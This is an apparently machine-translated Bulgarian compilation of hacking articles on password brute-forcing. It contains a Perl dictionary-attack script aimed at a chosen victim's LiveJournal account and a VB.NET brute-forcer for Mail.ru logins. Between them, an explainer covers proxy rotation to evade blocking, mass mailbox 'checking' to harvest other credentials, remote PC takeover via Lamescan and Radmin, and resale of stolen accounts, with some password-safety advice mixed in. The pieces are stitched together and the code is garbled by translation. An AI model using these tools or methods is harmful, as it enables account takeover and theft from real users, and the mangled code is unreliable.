Правя грубиян. Възстановяване на парола чрез груба сила

Всеки знае как се развиха нещата напоследък
Популярният ресурс е livejournal.com или просто LiveJournal.
Създаването на акаунт в тази система далеч не е лесно.
Просто. Или трябва да платите за ключа, или
попитайте го от приятелите си в LiveJournal.

Има известна поговорка: отколкото
да молите и да се унижавате е по-добре<вырезано
цензура> и мълчи :). Затова днес ние
ще пишем brute force, което е лесно
ще счупи ръцете на някой американец LiveJournal
глупости :). Разбира се, че трябва да изберете
жертва, която изпрати няколко съобщения след това
регистрация, а след това изчезна във водата, след това
Току що го публикувах в livejournal. Такива
Има много акаунти и те могат да бъдат намерени без тях
проблеми.

И така, да се върнем към нашата идея. Първо ние
трябва да знаете как да влезете
система. Като отидем на www.livejournal.com/login.bml ще видим
в горния десен ъгъл има малка форма за
Влизам Не, не съдя за големия в средата
екран. След като разгледах html кода, който избрах
малък. Факт е, че в тази форма всичко
два параметъра, за разлика от пълния. Нашите
бъдещата груба сила трябва да предава поне
данни за висока ефективност, следователно
Нека се съсредоточим върху тази форма.

Формата има два параметъра: потребител и парола. себе си
скриптът може да стане незадължителен
параметър на режима, чиято стойност е "вход".
Очевидно при предаване на потребител и парола системата
предполага упълномощаване. Нетърпеливо
като напишете връзката http://www.livejournal.com/login.bml?user=fuck&password=fucked в браузъра си
(разбира се, всички имена са променени за целите на
конспирация :)), получих обрат.
Системата е проектирана само за метода POST.
Но аз съм упорит човек и дори не можах да устоя
тази защита:].

Следващата стъпка беше възстановяване на паметта
относно работата на метода POST. За него
уместно е прехвърлянето на следните задължителни изисквания
параметри към сървъра:

ПУБЛИКУВАНЕ
Домакин
Съдържание-дължина

всъщност публикация :)

След като грубо скицираха молба за
сървър, получих следното:

POST /login.bml HTTP/1.1
Домакин: www.livejournal.com
Content-Type: application/x-www-form-urlencoded
Съдържание-дължина: 26

потребител=прецакане&парола=прецакано

Колкото и да е странно, не се получи :). Система
прокълнат в грешната парола. Мислех,
Има проверка за Referer и UserAgent, но направих грешка.
При подмяна на фалшиви параметри
сървърът също върна отговора - Неправилна парола. как
оказа се, ако го поставите след паролата
& и увеличете дължината на реда с
един, тогава сървърът успешно изяде данните и
върнати Loginned.

Наистина не исках да изпомпвам всичко
дълъг HTML ред и изрежете ред от него
Влезли сте. Исках да се огранича до скромно приемане
един килобайт данни :). Беше възможно
тъй като сървърът постави бисквитки в заглавните редове.
Ако отговорът е успешен, тези бисквитки съдържат
потребителско име и криптирана парола,
приблизително в този формат:

Set-Cookie: ljsession=ws:fuck:1:fDjwfWdsC; път=/; HttpOnly

Нищо не ни попречи да проверим дали заглавката съдържа
потребителско име и ако има такова, спрете
груба сила и запишете в лог акаунта.

На теория беше написана груба сила. Наляво
приложете този въпрос на практика. аз
Използвах Perl за кодиране, защото го познавам
езика е вече трета година и пасва идеално
за моите идеи. След като потърсих моя винт
шаблон за груба сила, намерих MIME груба сила за httpd акаунти,
който веднъж описах в този сайт :).
След като го промених малко, получих пълен
Груба сила на LiveJournal. Единственият му недостатък
е еднонишков, но за това
готин кодер като теб, не мисля, че ще се случи
голям проблем :). Остава за вас
прилагане на многопоточност, или
използвайте моята демо версия ;).

И така, действителният код:

#!/usr/bin/perl
използвайте IO::Socket; ##Използване на гнезда
$|++; ## Увеличаване
буферизирам
$server="www.livejournal.com"; ##Ние поставихме
сървър
$port="80"; ## И
порт :)
$logfile="cracked.log"; ##Тук
писане на хакнат акаунт
$words="bigdict.txt"; ## Нашите
голям речник, който ръководи
груба сила
$user="майната му"; ## потребител,
които разбиваме
$dir="/login.bml"; ## скрипт,
който връща състоянието
open(file, "$words") или die print "$!\n";
@данни= ;
$общо=@данни;
затворете файла; ##Да отворим
речник, запишете всички думи в масив
foreach $pass (@data) ( ##Цикъл от
всяка дума
$i++;
chomp($pass);
$socket=IO::Socket::INET->new(PeerAddr => $server,
PeerPort => $порт,
Proto => tcp)
or die print "Не може да се свърже към $server:$port\n"; ##
Създайте връзка с livejournal.com
$socket->autoflush(1); ##
Прекъснахме буферирането (за всеки случай, защото...
поради неизпълнение е намален)
$post="user=$user&password=$pass&"; ##
Формиране на POST заявка
$len=дължина($post);
$len+=1; ##Намиране на дължината
заявка (фраза + \r\n)
print $socket "POST $dir HTTP/1.1\r\n";
print $socket "Хост: www.livejournal.com\r\n";;
print $socket "Content-Type: application/x-www-form-urlencoded\r\n";
print $socket "Връзка: Затвори\r\n";
print $socket "Дължина на съдържанието: $len\r\n";
отпечатайте $socket "\r\n$post\r\n";

## Изпратете до гнездото
дълга заглавка

$socket->recv($answer,1024); ## И
четене връщане = 1 KB данни

if ($answer=~/\:$user\:/) (
open(logf, ">>$logfile") или die print "$!\n";
print logf "$user:$pass е ОК!!!\n";
затваряне на logf;
print "$user:$pass е ОК!!!\n";
изход 0; ## Ако съдържа
ред като:user: - напишете дневник и го попълнете.
} ## Иначе да проверим
следваща парола
}

Това всъщност е цялата груба сила. Проверен
На мен лично ми върши работа :). Но сметки
Няма да ти го дам да провериш - алчен съм ;), testi
сами по себе си. Както можете да видите, всичко е лесно за изпълнение,
ако просто искаш.

Brute force (излиза от английската фраза: груба сила) е вид хакерска атака - метод за хакване на акаунти в компютърни системи, платежни/банкови услуги и уебсайтове чрез автоматизиран избор на парола и комбинации за вход.

Грубата сила се основава на едноименния математически метод (груба сила), при който правилното решение - крайно число или символна комбинация - се намира чрез търсене в различни опции. Всъщност всяка стойност от даден набор от потенциални отговори (решения) се проверява за коректност.

Как работи грубата сила

Хакер пише специална програма за отгатване на пароли или използва готово решение от колегите си. Може да бъде насочен към конкретна имейл услуга, уебсайт, социална мрежа (т.е. предназначен е за хакване на определен ресурс). След това се извършва подготовка за хакване. Състои се от следните стъпки:

Изготвяне на прокси списък

За да се скрие истинският IP адрес на компютъра, от който ще бъде извършена атаката, и за да се предотврати блокиране от сайта, където акаунтът трябва да бъде хакнат, се конфигурира интернет връзка чрез прокси сървър.

Търсенето на прокси адреси/портове се извършва в Proxy Grabber. Тази помощна програма независимо извлича всички данни за свързване към междинни сървъри от сайтове, които предоставят прокси (те са посочени в списъка). С други думи, пълномощните се събират.

Получената база данни се записва в отделен текстов файл. След това всички адреси на сървъри, съдържащи се в него, се проверяват за работоспособност в програмата за проверка на прокси. Доста често програмите, предназначени за автоматизирано копаене на прокси, комбинират функциите на грабер и проверка.

В резултат на това получавате готов списък с прокси сървъри под формата на списък с IP/порт, записан в txt файл. (Ще ви трябва, когато настройвате програмата за груба сила).

Търсене на бази за Brute

Трябва да свържете речник с brute force - определен набор от комбинации от пароли и влизания - които той ще замени във формата за влизане. Той, подобно на прокси списъка, има формата на списък в обикновен текстов файл (.txt). Речниците, известни още като бази данни, се разпространяват чрез хакерски форуми, уебсайтове и услуги за хостване на файлове. По-опитните „занаятчии“ ги създават сами и ги предоставят на всички срещу заплащане. Колкото по-голяма е базата (брой комбинации, влизания, акаунти), толкова по-добре (за хакера) - толкова по-голяма е вероятността за успех на хакването.

Настройване на груба сила

Прокси списъкът се зарежда; програмата за избор автоматично ще промени проксито, така че уеб сървърът да не открие атаката и съответно източника (хоста) на атаката.

Свързан е речник на комбинации парола/вход. Броят на нишките е зададен - колко комбинации грубата сила ще проверява едновременно. Мощен компютър с висока интернет скорост може уверено да обработва 120-200 потока (това е оптималната стойност). Скоростта на брута директно зависи от тази настройка. Например, ако зададете само 10 нишки, изборът ще бъде много бавен.

Бягаща груба сила

Програмата записва успешни опити за хакване: записва свързаните акаунти (парола/вход) във файл. Продължителността на процедурата по подбор варира от няколко часа до няколко дни. Това обаче не винаги се оказва ефективно поради високата криптографска сила на данните за вход или прилагането на други защитни мерки от нападателя.

Видове груба сила

Лично хакване

Търсене на конкретен акаунт – в социална мрежа, в имейл услуга и др. Чрез или в процеса на виртуална комуникация, нападателят извлича от жертвата данни за вход за достъп до уебсайт. След това той разбива паролата с груба сила: използва груба сила, за да посочи адреса на уеб ресурса и полученото влизане и свързва речника.

Шансовете за такъв хак са малки, например, в сравнение със същата XSS атака. Може да бъде успешно, ако собственикът на акаунта използва парола от 6-7 знака с проста комбинация от символи. В противен случай „решаването“ на по-стабилни варианти от 12, 15, 20 букви, цифри и специални знаци ще отнеме години - десетки и стотици години, въз основа на изчисленията на формулата за математическо търсене.

Брут/чек

База данни с данни за влизане/пароли от пощенски кутии на една пощенска услуга (например mail.ru) или различни такива е свързана с груба сила. И прокси списък - за маскиране на възела (тъй като имейл уеб услугите бързо откриват атака въз основа на множество заявки от един IP адрес).

Опциите на грубияна показват списък с ключови думи (обикновено имена на сайтове) - ориентири, по които той ще търси информация за вход в хакнати пощенски кутии (например: steampowered, worldoftanks, 4game, VK). Или конкретен интернет ресурс.

Когато се регистрира в онлайн игра, социална мрежа или форум, потребителят, както се очаква, посочва своя имейл (пощенска кутия). Уеб услугата изпраща съобщение до посочения адрес с информация за вход и връзка за потвърждение на регистрацията. Именно тези писма се търсят с груба сила, за да се извлекат данни за вход и пароли от тях.

Щракнете върху “СТАРТ” и програмата за кракване започва груба сила. Действа по следния алгоритъм:

Зарежда данните за вход/парола за имейла от базата данни.
Проверява достъпа или „проверява“ (автоматично влизане): ако е възможно да влезете в акаунта, той добавя такъв в колоната за добро (това означава, че е намерен друг работен имейл) и започва да го преглежда (вижте следните точки ); ако няма достъп, той е посочен като лош.
Във всички „бипкания“ (отворени имейли), грубата сила сканира писмата според заявката, посочена от хакера - тоест търси вход/пароли към посочените сайтове и платежни системи.
Когато се намерят необходимите данни, той ги копира и записва в отделен файл.

Така се получава масово „отвличане“ на акаунти – от десетки до стотици. Нападателят се разпорежда с получените „трофеи” по свое усмотрение - продажба, обмен, събиране на данни, кражба на пари.

Дистанционно хакване на компютър

Грубата сила, заедно с други хакерски помощни програми, се използва за получаване на отдалечен достъп до защитен с парола компютър на жертва чрез интернет канал.

Този тип атака се състои от следните етапи:

Извършва се търсене на IP мрежи, в които ще се извърши атаката на потребителските компютри. Адресните диапазони се вземат от специални бази данни или чрез специални програми, като IP Geo. В него можете да изберете IP мрежи за конкретен район, регион и дори град.
Избраните IP диапазони и речници за избор се задават в настройките на Lamescan brute force (или негов аналог), предназначени за отдалечено грубо влизане/парола. Веднъж стартиран, Lamescan прави следното:

осъществява връзка към всяко IP от даден диапазон;
след установяване на връзка се опитва да се свърже с хоста (PC) през порт 4899 (но може да има и други опции);
ако портът е отворен: опитва се да получи достъп до системата, когато бъде поискана парола, извършва отгатване; ако е успешен, той запазва IP адреса на хоста (компютъра) и информацията за влизане в своята база данни.

Хакерът стартира помощната програма Radmin, предназначена за управление на отдалечени компютри. Задава мрежовите координати на жертвата (IP, потребителско име и парола) и получава пълен контрол върху системата - работния плот (показва се визуално на дисплея на компютъра на атакуващия), файлови директории, настройки.

Програми за Брут

Класическа груба сила, една от първите. Въпреки това, той не губи своята актуалност и се конкурира с нови решения. Има бърз алгоритъм за груба сила и поддържа всички основни интернет протоколи - TCP/IP, POP3, HTTP и др. Може да фалшифицира бисквитки. Изчиства речника и генерира независимо пароли.

Мощен брут контролер. Оборудван с разширен арсенал от функции за работа с бази данни (проверка, сортиране по домейн). Поддържа различни видове проксита и проверява тяхната функционалност. Сканира писма в пощенските кутии въз основа на настройки като дата, ключова дума, адрес, непрочетени съобщения. Може да изтегля писма от Mail.ru и Yandex.

Appnimi Password Unlocker

Програма за грубо въвеждане на парола за файл на локален компютър. Един вид работен кон. Безплатната версия на програмата ви позволява да избирате пароли с не повече от 5 знака. Можете да прочетете как да инсталирате и използвате Appnimi Password Unlocker

В игри, социални мрежи и др., които са получени незаконно, т.е. хакнати или откраднати. Разбира се, какво е грубиян и как работи е доста трудно да се разбере, но ще се опитаме да го направим. Но първо, нека разберем как да избегнем да станем следващата жертва на нападатели.

Какво е груба сила и как да се предпазим от нея

Така че има специален софтуер, който ви позволява да намерите правилните пароли за съществуващи вход, имейли и т.н., като изберете комбинации от цифри и букви. Разбира се, има редица функции в работата на такива програми. Например, колкото по-дълга и по-сложна е паролата, толкова повече време ще отнеме разбиването й и нещата могат да стигнат до момента, в който грубата сила ще се провали. Що се отнася до времето, много зависи от изчислителната мощност на оборудването и интернет връзката. Така че процесът може да продължи от няколко минути и да се проточи до ден или повече.

Вероятно вече разбирате какво е груба сила на акаунта. Що се отнася до сигурността, както беше отбелязано по-горе, препоръчително е да зададете парола, която е трудно да запомните сами. Например RKGJH4hKn2. Безопасно е да се каже, че хакването му ще бъде доста проблематично. Освен това трябва да запомните, че например много еднакви букви не дават никакъв ефект, точно както числата. Всичко трябва да бъде объркано и смесено, препоръчително е да редувате главни и малки букви.

Какво е Brute base?

Разбира се, програмата няма да работи, ако няма данни. Така че, ако тя няма от какво да отгатва пароли, тогава тя няма да направи това. Базата данни е набор от пароли и влизания. Колкото по-обширен е този списък, толкова по-голям е шансът акаунтът да бъде хакнат. Много зависи от това какви комбинации присъстват в него, тоест колкото по-компетентно е съставен, толкова по-добре. Също така си струва да се отбележи, че базата данни включва не само пароли, но и влизания, тъй като brute force, което означава „груба сила“ на английски, може едновременно да избере и двете.

Струва си да се отбележи, че самият файл, в който се съхраняват всички записи, е доста голям. Минималната дължина на комбинацията е 3 букви и цифри, максималната е 8-16, в зависимост от програмата и нейната версия. Изборът започва с буквата „А“ и завършва с последната буква от английската или руската азбука. Това е по същество цялата информация за базите данни, която може да ви бъде полезна.

Кому е нужно това и защо?

Трудно е да се отговори еднозначно на този въпрос. Хората се опитват да хакнат акаунти по много причини. Може да е просто за забавление, желание да четете писма на други хора, да изпращате невалидни съобщения и т.н. Работата е там, че това е незаконно. Освен това може да се счита за истинска кражба и трябва да отговаряте за това. Силно не се препоръчва да правите такива неща, особено след като понякога това е загуба на време.

Дори акаунтът ви да бъде хакнат, той може да бъде възстановен бързо и лесно. Това е особено лесно да се направи, ако сте предоставили реални данни при регистрацията. Що се отнася до акаунтите, създадени набързо, връщането им ще бъде много по-трудно. Но, както показва практиката, такива акаунти не се оценяват от хакерите. Няма смисъл да отнемате акаунт или поща на някого, в който няма нищо полезно и няма нужда да говорите отново за това.

Кой използва груба сила?

Няма да е излишно да кажем, че това се прави от така наречените хакери. Това се отнася за мащабни хакове. Като цяло такива хора изкарват хляба си от това и го правят много умело. И схемата работи по следния начин. Използвайки груба сила, се избират потребителски имена и пароли (определен брой), след което всичко се продава на едро на клиентите. Тоест самите хакери на практика не използват незаконно полученото, а просто го продават. Но кой е купувачът, ще попитате?

Може да е всеки. Единственото нещо, което може да се каже е, че те се занимават със закупуване на голям брой акаунти. След това тези акаунти се продават на обикновени потребители, които след това са изненадани, че са се върнали при първоначалния си собственик. Същото важи и за личните данни на платежните системи (Webmoney, Qiwi). В допълнение към факта, че има възможност за получаване на определена сума средства, такава сметка може да бъде продадена, това е особено вярно в случаите, когато има скъпи сертификати, потвърждаващи компетентността на собственика.

Малко за прокси сървърите за груба сила

Всеки уважаващ себе си хакер на първо място мисли как да се защити. И тъй като това, което прави, е напълно незаконно, на това трябва да се обърне специално внимание. Вече знаем какво е груба сила и сега бих искал да ви кажа как работи прокси сървърът. Това ще ви позволи да останете незабелязани по време на хакване на акаунт. С прости думи, IP адресът остава неизвестен. Това е основната защита за хора, които хакват чужди акаунти.

Но това не е всичко. След като акаунтът е бил хакнат, трябва да влезете в него. Но дори и с правилното потребителско име и парола, понякога това не е лесно да се направи. Например, промяната на IP адреса включва изпращане на код за сигурност на вашия имейл или телефон; такава система се използва успешно от Valve, по-специално за защита на техния продукт, наречен Steam. Разбира се, за Брут вече стана ясно. Следователно можем да влезем във всеки акаунт и да не събудим никакви подозрения, което прави престъплението перфектно.

Няма нужда да повтаряме още веднъж, че паролата трябва да е дълга и сложна. Също така не се препоръчва да използвате акаунта си на многолюдни места или на работа, където всеки може да използва компютър или лаптоп. Първо, може да се използва специална шпионска програма, която запомня кои клавиши са били натиснати; както разбирате, няма да е трудно да разберете паролата.

Но това не е всичко, което трябва да знаете. Препоръчително е да не помните паролата в браузъра, тъй като тя може да бъде прихваната. Има акаунти, в които при влизане веднага получавате SMS с код за потвърждение на мобилния си телефон. Ето защо, ако пристигне и нямате нищо общо с него, променете паролата и е препоръчително да действате възможно най-бързо.

Каква е разликата между брут и пул?

И така, нека сега да разберем каква е разликата между тези две понятия. И така, вече решихме, че грубата сила ви позволява да изберете потребителско име и парола, като просто търсите от речника (базата). Нека да разгледаме пример за хакване на имейл услуга. Например получихме достъп, но какво да правим след това? Като правило се интересуваме от информация за акаунти в социални мрежи, онлайн игри, платежни системи и т.н. Така проверяващият проверява имейл паролата, която вече имаме, за съвпадения.

С прости думи, ако съвпада, например, с инсталирания във VKontakte, тогава ще го разпознаем веднага. Можем да заключим, че това ще ни лиши от излишни главоболия. Следователно процесът е по-автоматизиран и на практика не изисква нашето участие. Сега знаете какво са brute и checker и как работят тези програми.

Заключение

Въз основа на гореизложеното могат да се направят определени изводи. Акаунтът трябва да се използва само на персонален компютър, когато е изключен достъпът на неоторизирани хора. Същото важи и за връзките към безплатен Wi-Fi, тъй като има възможност за прихващане на потока от данни и последваща кражба на вашия акаунт. Тъй като вече знаеш, Брут, ще ти бъде много по-лесно да се защитиш. Както се казва, този, който е наясно, е въоръжен. Не забравяйте, че доколко добре е защитен вашият акаунт зависи само от вас. Ако сте направили всичко правилно, тогава няма нужда да се притеснявате отново и е малко вероятно да имате нужда да знаете какво е грубата сила на акаунта и нюансите на това как работи програмата.

Здравейте всички! Най-накрая намерих време да напиша дълга статия.

В него ще ви покажа как се пише BruteForce (разговорно "брут").

1) Малко история

В началото на годината започнах да търся информация за писане на brute force в интернет.

Имаше много малко от него, дори трябваше да преведа нещо от испански =)).

Но аз не се отказах и продължих търсенето си и преди два месеца разбрах всичко и написах проста еднопоточна груба сила. Но това беше далеч от „гиганти“ като „Brutus AET2“. Започнах да търся информация за многопоточността и търсенето ми се увенча с успех. Сега цялата информация е събрана и пиша тази статия, така че тези, които са решили да напишат груба сила, не трябва да пълзят из ъглите на мрежата, събирайки информация.

2) Теория

В предишната си история споменах думата груба сила повече от веднъж. Какво е?

Ще ви покажа с пример: Да приемем, че сте забравили паролата си за имейл (между другото, това се случва доста често).

Можете да опитате да възстановите паролата си чрез защитен въпрос или мобилен телефон, но ако нямате мобилен телефон и защитният въпрос казва „Колко зъби има на дясната лапа на моята котка?“

Какво да правим тогава? Точно така, опитайте се да познаете паролата. Но как??? Ръчно?? Разбира се, че не, за това е създадена грубата сила, за да направи грубата сила вместо вас.

Принципът на работа е прост: посочваме нашия имейл и свързваме списък с пароли. Щракнете върху Старт и се заемете с бизнеса си. Когато се намери правилната парола, грубата сила ще я покаже на екрана.

Всичко би било наред, но какво ще стане, ако имаме милион пароли в нашия речник? Brutus ще изпрати милион заявки до сървъра и сървърът ще си помисли, че се опитваме да хакнем пощенската кутия на някой друг и просто ще блокира нашия IP адрес. Как тогава?

За целта са предвидени прокси сървъри. Няма да ви казвам какво е, тъй като темата е доста обширна. Можете да прочетете за проксита. С две думи: прокситата ще сменят нашия IP и търсенето ще продължи.

Последната точка от теорията е режимите на търсене.

Има само две от тях: еднонишкови и многонишкови.

В еднопоточен режим грубата сила взема първата парола и чака отговор от сървъра. Когато се получи отговор, се взема следващата парола и т.н.

В многонишковия режим грубата сила създава много нишки. Във всеки от тях се появява груба сила, т.е. грубата сила не трябва да чака отговор от сървъра, за да продължи. Той просто създава следващата нишка и търсенето продължава.

Пример: Решавате да изтеглите филм чрез торент. Намерихте торент файл и започнахте да го изтегляте. Докато тече изтеглянето, вие например сте отишли в Контакт и сте си кореспондирали с приятели. В една нишка браузърът работи, в друга торентът усърдно тегли филм, а в третата антивирусната сканира системата и т.н.

Надявам се, че го обясних ясно.

2) Дългоочаквана практика

Докато пишем проста еднонишкова груба сила (за да не претоварваме мозъка си), а във втората част ще говоря за създаването на многонишкова груба сила и промяната

proxy + Ще предоставя моите части от кода, които можете да използвате във вашите проекти.

Така! Отивам.

Отворете VB.NET, създайте обикновен проект и направете нещо подобно:

Сега трябва да вземем решение за сървъра и да „подушим“ заявките.

Ще ви покажа, използвайки Mail.ru като пример:

Използвайки го, ще видим как се извършва оторизацията на сървъра.

2) Стартирайте самостоятелна версия на програмата: 3

3) Отидете в пощата на Mail.ru и въведете данните, но все още не влизайте:

4) В HttpAnalyzer щракнете върху паузата.

Връщаме се към Mail Mail и щракнете върху Вход.

Сега обратно към снифера. Наблюдаваме следното:

POST заявката за скрипта за оторизация е маркирана в синьо.

Да видим какви данни се изпращат:

Вход - Вход

Домейн – Домейн

Парола - парола

Saveauth - Трябва ли да запазим данните си (не съм сигурен точно)

Не мога да кажа нищо за последния параметър, но не ни трябва :n =)

Нека се опитаме да изпратим заявка:

Ако всичко е въведено правилно, ще стигнете до имейла си.

Ако не, ще видите съобщение за грешка при влизане.

За да направите това, отидете в раздела Бисквитки. Интересуваме се от дясната страна:

Виждаме, че са създадени две бисквитки: Mpop и t.

"Set - Cookie" - заглавно поле, изпратено до сървъра.

6) Сега нека въведем левите данни и да анализираме резултата.

Виждаме, че не се създават бисквитки.

Страхотен! Сега знаем как да пишем груба сила:

Първо, нека декларираме масив, в който ще поставим пароли от речника:

Обществен PassList като нов ArrayList

Код за бутона "..." (три точки):

Dim f As New OpenFileDialog "Създаване на нов диалогов прозорец за отваряне на файл Ако f.ShowDialog = Windows.Forms.DialogResult.OK и f.FileName<>"" Тогава " Ако потребителят е избрал списък, тогава PassList.AddRange(IO.File.ReadAllLines(f.FileName)) " Прочетете всички пароли в масива txtPassList.Text=f.FileName " Показване на пътя до файла в текстовото поле End If

Сега кодът за бутона Започнете търсене:

Ако txtLogin.Text<>"" След това " Ако сте въвели данни за вход, след това Dim i As Integer = 0 " Декларирайте брояч за търсене For i = 0 To PassList.Count - 1 " Търсете, докато има пароли System.Threading.Thread.Sleep(1000) Dim Заявка като Net. HttpWebRequest = Net.HttpWebRequest.Create("http://win.mail.ru/cgi-bin/auth?Login=" & txtLogin.Text & "&Domain=" & Split(txtLogin.Text, "@ ")(1 ) _ & "&Password=" & PassList(i)) " Формиране на заявка Dim Response As Net.HttpWebResponse "Метод на пренос на данни: Request.Method = "POST" "Забрана на автоматичните преходи Request.AllowAutoRedirect = False "Изпращане a request Response = Request.GetResponse "Проверете бисквитките If Response.Headers("Set-Cookie").IndexOf("Mpop") = 0 Then " Ако има Mpop бисквитка, тогава MsgBox("Избрана парола: " + PassList( i)) " Показване на правилната парола Exit Sub " Завършете търсенето End If Next End If

Ако нещо не е ясно, пишете ми. Ще оставя моите данни за контакт по-долу.

Създаваме речник на паролите като:

[ето правилната парола]

234411dsdfd

Копирайте и променете червения текст на вашата парола.

Свързваме всичко към програмата: